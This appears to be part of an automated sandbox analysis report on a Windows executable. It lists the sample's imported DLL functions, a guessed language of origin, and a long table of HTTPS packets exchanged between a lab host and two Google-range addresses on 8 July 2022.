ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 8, 2022 06:01:37.203104973 CEST	49737	443	192.168.11.20	142.250.186.78
Jul 8, 2022 06:01:37.203182936 CEST	443	49737	142.250.186.78	192.168.11.20
Jul 8, 2022 06:01:37.203458071 CEST	49737	443	192.168.11.20	142.250.186.78
Jul 8, 2022 06:01:37.228729963 CEST	49737	443	192.168.11.20	142.250.186.78
Jul 8, 2022 06:01:37.228786945 CEST	443	49737	142.250.186.78	192.168.11.20
Jul 8, 2022 06:01:37.267627001 CEST	443	49737	142.250.186.78	192.168.11.20
Jul 8, 2022 06:01:37.267869949 CEST	49737	443	192.168.11.20	142.250.186.78
Jul 8, 2022 06:01:37.268357038 CEST	443	49737	142.250.186.78	192.168.11.20
Jul 8, 2022 06:01:37.268537045 CEST	49737	443	192.168.11.20	142.250.186.78
Jul 8, 2022 06:01:37.369337082 CEST	49737	443	192.168.11.20	142.250.186.78
Jul 8, 2022 06:01:37.369426012 CEST	443	49737	142.250.186.78	192.168.11.20
Jul 8, 2022 06:01:37.370131016 CEST	443	49737	142.250.186.78	192.168.11.20
Jul 8, 2022 06:01:37.370307922 CEST	49737	443	192.168.11.20	142.250.186.78
Jul 8, 2022 06:01:37.374569893 CEST	49737	443	192.168.11.20	142.250.186.78
Jul 8, 2022 06:01:37.418570995 CEST	443	49737	142.250.186.78	192.168.11.20
Jul 8, 2022 06:01:37.956120014 CEST	443	49737	142.250.186.78	192.168.11.20
Jul 8, 2022 06:01:37.956424952 CEST	49737	443	192.168.11.20	142.250.186.78
Jul 8, 2022 06:01:37.956487894 CEST	443	49737	142.250.186.78	192.168.11.20
Jul 8, 2022 06:01:37.956620932 CEST	443	49737	142.250.186.78	192.168.11.20
Jul 8, 2022 06:01:37.956671000 CEST	49737	443	192.168.11.20	142.250.186.78
Jul 8, 2022 06:01:37.956768036 CEST	49737	443	192.168.11.20	142.250.186.78
Jul 8, 2022 06:01:37.956806898 CEST	443	49737	142.250.186.78	192.168.11.20
Jul 8, 2022 06:01:37.956815958 CEST	49737	443	192.168.11.20	142.250.186.78
Jul 8, 2022 06:01:37.956984043 CEST	49737	443	192.168.11.20	142.250.186.78
Jul 8, 2022 06:01:38.069745064 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.069823980 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.069998026 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.070383072 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.070432901 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.105865002 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.106085062 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.106517076 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.106745958 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.110111952 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.110244989 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.110433102 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.110699892 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.154514074 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.370296001 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.370522022 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.371035099 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.371253014 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.371289968 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.371306896 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.372268915 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.372519016 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.372875929 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.373126030 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.373178959 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.373435020 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.373486042 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.373724937 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.373773098 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.374078035 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.380456924 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.380657911 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.380703926 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.380757093 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.381009102 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.381047964 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.381072998 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.381331921 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.381421089 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.381647110 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.381700039 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.381958961 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.382158995 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.382405043 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.382452011 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.382705927 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.382839918 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.383037090 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.383110046 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.383160114 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.383359909 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.383558035 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.383604050 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.383848906 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.383882046 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.384202003 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.384342909 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.384579897 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.384615898 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.384809017 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.385029078 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.385210037 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.385232925 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.385377884 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.385668039 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.385924101 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.385974884 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.386229992 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.386290073 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.386410952 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.386518955 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.386550903 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.386792898 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.386830091 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.387409925 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.387593985 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.387801886 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.387860060 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.387870073 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.388153076 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.388195992 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.388298035 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.388499022 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.388529062 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.388536930 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.388849974 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.389169931 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.389358997 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.389780998 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.389832020 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.390188932 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.390927076 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.391146898 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.391222954 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.391243935 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.391284943 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.391402960 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.391705990 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.391745090 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.391971111 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.392050028 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.392173052 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.392353058 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.392381907 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.392390013 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.392659903 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.392936945 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.393136024 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.393178940 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.393220901 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.393352985 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.393526077 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.393548965 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.393882990 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.393914938 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.393942118 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.394117117 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.394157887 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.394169092 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.394184113 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.394203901 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.394412994 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.394629955 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.394802094 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.394804001 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.394840002 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.394993067 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.395378113 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.395565033 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.395656109 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.395771980 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.395807028 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.395817041 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.395941019 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.396136045 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.396204948 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.396393061 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.396399975 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.396428108 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.396624088 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.396646023 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.396862984 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.397118092 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.397301912 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.397402048 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.397556067 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.397579908 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.397588015 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.397749901 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.397927999 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.397943974 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.397969961 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.398137093 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.398168087 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.398175001 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.398188114 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.398426056 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.398920059 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.399111986 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.399115086 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.399178028 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.399272919 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.399445057 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.399466038 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.399693012 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.399727106 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.399755955 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.399931908 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.400012970 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.400026083 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.400047064 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.400069952 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.400182009 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.400372982 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.400465012 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.400655031 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.400686979 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.400722980 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.400825977 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.400918007 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.400934935 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.400950909 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.401108980 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.401304007 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.401365995 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.401562929 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.401654959 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.401664972 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.401685953 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.401820898 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.401840925 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.401992083 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.402019978 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.402026892 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.402180910 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.402441025 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.402697086 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.402719975 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.402765989 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.402920961 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.403059006 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.403074026 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.403105021 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.403112888 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.403254986 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.403331041 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.403351068 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.403361082 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.403362036 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.403388023 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.403490067 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.403544903 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.403661013 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.403692007 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.403702974 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.403726101 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.403852940 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.403878927 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.404046059 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.404071093 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.404217958 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.404264927 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.404405117 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.404429913 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.404438019 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.404450893 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.404457092 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.404652119 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.404670000 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.404680014 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.404732943 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.404953003 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.405035973 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.405051947 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.405072927 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.405122995 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.405241013 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.405297041 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.405329943 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.405421019 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.405502081 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.405514002 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.405517101 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.405539036 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.405700922 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.405716896 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.405718088 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.405726910 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.405744076 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.405894041 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.405916929 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.405927896 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.405945063 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.406111002 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.406238079 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.406265974 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.406275988 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.406289101 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.406404972 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.406585932 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.406610966 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.406656027 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.406908035 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.406917095 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.406954050 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.407083988 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.407191038 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.407288074 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.407325983 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.407339096 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.407449961 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.407485008 CEST	443	49738	142.250.185.225	192.168.11.20
Jul 8, 2022 06:01:38.407603979 CEST	49738	443	192.168.11.20	142.250.185.225
Jul 8, 2022 06:01:38.407634020 CEST	443	49738	142.250.185.225	192.168.11.20
